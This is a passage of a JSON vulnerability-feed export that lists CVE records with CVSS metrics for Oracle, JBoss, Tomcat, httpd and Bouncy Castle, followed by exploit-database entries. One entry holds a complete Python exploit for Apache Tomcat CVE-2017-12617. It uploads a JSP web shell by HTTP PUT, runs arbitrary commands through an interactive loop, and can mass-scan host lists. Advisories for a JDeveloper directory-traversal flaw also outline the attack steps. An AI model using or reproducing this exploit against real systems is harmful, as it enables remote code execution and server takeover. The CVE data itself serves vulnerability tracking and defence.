Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Buffer overflow", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10068"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2017-10068", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-10068", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-11-22T02:44:24", "description": "Vulnerability in the Oracle WebCenter Content component of Oracle Fusion Middleware (subcomponent: Content Server). The supported version that is affected is 11.1.1.9.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2564"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2018-2564", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2564", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-11-22T03:56:11", "description": "Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-09T17:29:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2020-07-15T03:15:00", "id": "PRION:CVE-2015-7501", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-7501", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T02:44:41", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: BI Platform Security). Supported versions that are affected are 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2715"], "modified": "2020-08-24T17:37:00", "id": "PRION:CVE-2018-2715", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2715", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T02:44:24", "description": "Vulnerability in the Oracle HTTP Server component of Oracle Fusion Middleware (subcomponent: Web Listener). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 12.1.3.0.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle HTTP Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2561"], "modified": "2018-01-25T13:53:00", "id": "PRION:CVE-2018-2561", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2561", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T02:44:42", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2711"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2018-2711", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2711", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-11-22T03:01:25", "description": "When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2017-10-04T01:29:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12617"], "modified": "2019-04-23T19:29:00", "id": "PRION:CVE-2017-12617", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-12617", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:22:47", "description": "Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}}, "published": "2017-09-18T15:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2021-06-06T11:15:00", "id": "PRION:CVE-2017-9798", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-9798", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T03:56:58", "description": "The Bouncy Castle Java library before 1.51 does not validate a point is withing the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an \"invalid curve attack.\"", "cvss3": {}, "published": "2015-11-09T16:59:00", "type": "prion", "title": "Information disclosure", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2019-01-16T19:29:00", "id": "PRION:CVE-2015-7940", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-7940", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2018-01-19T00:21:27", "description": "", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "packetstorm", "title": "Oracle JDeveloper IDE Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-18T00:00:00", "id": "PACKETSTORM:145966", "href": "https://packetstormsecurity.com/files/145966/Oracle-JDeveloper-IDE-Directory-Traversal.html", "sourceData": "`[+] Credits: John Page (aka hyp3rlinx) \n[+] Website: hyp3rlinx.altervista.org \n[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt \n[+] ISR: apparition security \n \n \nVendor: \n============= \nwww.oracle.com \n \n \nProduct: \n=========== \nJDeveloper IDE \n \nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based \napplications addressing every step of the application lifecycle. \n \n \n \nVulnerability Type: \n=================== \nDirectory Traversal \n \n \n \nCVE Reference: \n============== \nCVE-2017-10273 \n \n \n \nSecurity Issue: \n================ \nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives. \nLater, attackers can potentially request these scripts/files to execute system commands on affected target. \n \n \nAffected versions: \n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0 \n \n \nReferences: \n============ \nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html \n \n \n \nExploit/POC: \n============= \n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands. \n2) import into JDeveloper \n3) files get moved outside target directories to one of the attackers choosing. \n4) attacker requests the malicious file contained in target directory. \n \nBAM! \n \n \nNetwork Access: \n=============== \nLocal \n \n \n \nSeverity: \n========= \nLow \n \n \n \nDisclosure Timeline: \n============================= \nVendor Notification: October 14, 2016 \nVendor fixes as part of CPU January 16, 2018 \nJanuary 17, 2018 : Public Disclosure \n \n \n \n[+] Disclaimer \nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. \nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and \nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit \nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility \nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information \nor exploits by the author or elsewhere. All content (c). \n \nhyp3rlinx \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145966/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-10-11T22:38:48", "description": "", "cvss3": {}, "published": "2017-10-10T00:00:00", "type": "packetstorm", "title": "Apache Tomcat Upload Bypass / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2017-10-10T00:00:00", "id": "PACKETSTORM:144557", "href": "https://packetstormsecurity.com/files/144557/Apache-Tomcat-Upload-Bypass-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nimport requests \nimport re \nimport signal \nfrom optparse import OptionParser \n \n \n \n \n \n \n \n \nclass bcolors: \nHEADER = '\\033[95m' \nOKBLUE = '\\033[94m' \nOKGREEN = '\\033[92m' \nWARNING = '\\033[93m' \nFAIL = '\\033[91m' \nENDC = '\\033[0m' \nBOLD = '\\033[1m' \nUNDERLINE = '\\033[4m' \n \n \n \n \nbanner=\"\"\" \n \n \n_______ ________ ___ ___ __ ______ __ ___ __ __ ______ \n/ ____\\ \\ / / ____| |__ \\ / _ \\/_ |____ | /_ |__ \\ / //_ |____ | \n| | \\ \\ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / \n| | \\ \\/ / | __|______/ /| | | || | / /______| | / / '_ \\| | / / \n| |____ \\ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / \n\\_____| \\/ |______| |____|\\___/ |_|/_/ |_|____\\___/|_|/_/ \n \n \n \n[@intx0x80] \n \n\"\"\" \n \n \n \n \n \ndef signal_handler(signal, frame): \n \nprint (\"\\033[91m\"+\"\\n[-] Exiting\"+\"\\033[0m\") \n \nexit() \n \nsignal.signal(signal.SIGINT, signal_handler) \n \n \n \n \ndef removetags(tags): \nremove = re.compile('<.*?>') \ntxt = re.sub(remove, '\\n', tags) \nreturn txt.replace(\"\\n\\n\\n\",\"\\n\") \n \n \ndef getContent(url,f): \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} \nre=requests.get(str(url)+\"/\"+str(f), headers=headers) \nreturn re.content \n \ndef createPayload(url,f): \nevil='<% out.println(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");%>' \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} \nreq=requests.put(str(url)+str(f)+\"/\",data=evil, headers=headers) \nif req.status_code==201: \nprint \"File Created ..\" \n \n \ndef RCE(url,f): \nEVIL=\"\"\"<FORM METHOD=GET ACTION='{}'>\"\"\".format(f)+\"\"\" \n<INPUT name='cmd' type=text> \n<INPUT type=submit value='Run'> \n</FORM> \n<%@ page import=\"java.io.*\" %> \n<% \nString cmd = request.getParameter(\"cmd\"); \nString output = \"\"; \nif(cmd != null) { \nString s = null; \ntry { \nProcess p = Runtime.getRuntime().exec(cmd,null,null); \nBufferedReader sI = new BufferedReader(new \nInputStreamReader(p.getInputStream())); \nwhile((s = sI.readLine()) != null) { output += s+\"</br>\"; } \n} catch(IOException e) { e.printStackTrace(); } \n} \n%> \n<pre><%=output %></pre>\"\"\" \n \n \n \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} \n \nreq=requests.put(str(url)+f+\"/\",data=EVIL, headers=headers) \n \n \n \ndef shell(url,f): \n \nwhile True: \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} \ncmd=raw_input(\"$ \") \npayload={'cmd':cmd} \nif cmd==\"q\" or cmd==\"Q\": \nbreak \n \nre=requests.get(str(url)+\"/\"+str(f),params=payload,headers=headers) \nre=str(re.content) \nt=removetags(re) \nprint t \n \n \n \n \n \n#print bcolors.HEADER+ banner+bcolors.ENDC \n \nparse=OptionParser( \n \n \nbcolors.HEADER+\"\"\" \n \n \n_______ ________ ___ ___ __ ______ __ ___ __ __ ______ \n/ ____\\ \\ / / ____| |__ \\ / _ \\/_ |____ | /_ |__ \\ / //_ |____ | \n| | \\ \\ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / \n| | \\ \\/ / | __|______/ /| | | || | / /______| | / / '_ \\| | / / \n| |____ \\ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / \n\\_____| \\/ |______| |____|\\___/ |_|/_/ |_|____\\___/|_|/_/ \n \n \n \n \n./cve-2017-12617.py [options] \n \noptions: \n \n-u ,--url [::] check target url if it's vulnerable \n-p,--pwn [::] generate webshell and upload it \n-l,--list [::] hosts list \n \n[+]usage: \n \n./cve-2017-12617.py -u http://127.0.0.1 \n./cve-2017-12617.py --url http://127.0.0.1 \n./cve-2017-12617.py -u http://127.0.0.1 -p pwn \n./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn \n./cve-2017-12617.py -l hotsts.txt \n./cve-2017-12617.py --list hosts.txt \n \n \n[@intx0x80] \n \n\"\"\"+bcolors.ENDC \n \n) \n \n \nparse.add_option(\"-u\",\"--url\",dest=\"U\",type=\"string\",help=\"Website Url\") \nparse.add_option(\"-p\",\"--pwn\",dest=\"P\",type=\"string\",help=\"generate webshell and upload it\") \nparse.add_option(\"-l\",\"--list\",dest=\"L\",type=\"string\",help=\"hosts File\") \n \n(opt,args)=parse.parse_args() \n \nif opt.U==None and opt.P==None and opt.L==None: \nprint(parse.usage) \nexit(0) \n \n \n \nelse: \nif opt.U!=None and opt.P==None and opt.L==None: \nprint bcolors.OKGREEN+banner+bcolors.ENDC \nurl=str(opt.U) \nchecker=\"Poc.jsp\" \nprint bcolors.BOLD +\"Poc Filename {}\".format(checker) \ncreatePayload(str(url)+\"/\",checker) \ncon=getContent(str(url)+\"/\",checker) \nif 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: \nprint bcolors.WARNING+url+' it\\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC \nprint bcolors.WARNING+url+\"/\"+checker+bcolors.ENDC \n \nelse: \nprint 'Not Vulnerable to CVE-2017-12617 ' \nelif opt.P!=None and opt.U!=None and opt.L==None: \nprint bcolors.OKGREEN+banner+bcolors.ENDC \npwn=str(opt.P) \nurl=str(opt.U) \nprint \"Uploading Webshell .....\" \npwn=pwn+\".jsp\" \nRCE(str(url)+\"/\",pwn) \nshell(str(url),pwn) \nelif opt.L!=None and opt.P==None and opt.U==None: \nprint bcolors.OKGREEN+banner+bcolors.ENDC \nw=str(opt.L) \nf=open(w,\"r\") \nprint \"Scaning hosts in {}\".format(w) \nchecker=\"Poc.jsp\" \nfor i in f.readlines(): \ni=i.strip(\"\\n\") \ncreatePayload(str(i)+\"/\",checker) \ncon=getContent(str(i)+\"/\",checker) \nif 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: \nprint str(i)+\"\\033[91m\"+\" [ Vulnerable ] \"\"\\033[0m\" \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144557/atomcat-uploadexec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle JDeveloper 11.1.x12.x - Directory Traversal", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 4.7, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.7}, "published": "2018-01-21T00:00:00", "type": "exploitpack", "title": "Oracle JDeveloper 11.1.x12.x - Directory Traversal", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-21T00:00:00", "id": "EXPLOITPACK:65B3837C7995B55CBE45A13A505B8C67", "href": "", "sourceData": "[+] Credits: John Page (aka hyp3rlinx)\t\t\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt\n[+] ISR: apparition security \n \n\nVendor:\n=============\nwww.oracle.com\n\n\nProduct:\n===========\nJDeveloper IDE\n\nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based\napplications addressing every step of the application lifecycle.\n\n\n\nVulnerability Type:\n===================\nDirectory Traversal\n\n\n\nCVE Reference:\n==============\nCVE-2017-10273\n\n\n\nSecurity Issue:\n================\nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives.\nLater, attackers can potentially request these scripts/files to execute system commands on affected target.\n\n\nAffected versions:\n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0\n\n\nReferences:\n============\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n\n\n\nExploit/POC:\n=============\n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a script to execute system commands.\n2) import into JDeveloper\n3) files get moved outside target directories to one of the attackers choosing.\n4) attacker requests the malicious file contained in target directory.\n\nBAM!\n\n\nNetwork Access:\n===============\nLocal\n\n\n\nSeverity:\n=========\nLow\n\n\n\nDisclosure Timeline:\n=============================\nVendor Notification: October 14, 2016\nVendor fixes as part of CPU January 16, 2018\nJanuary 17, 2018 : Public Disclosure\n\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not 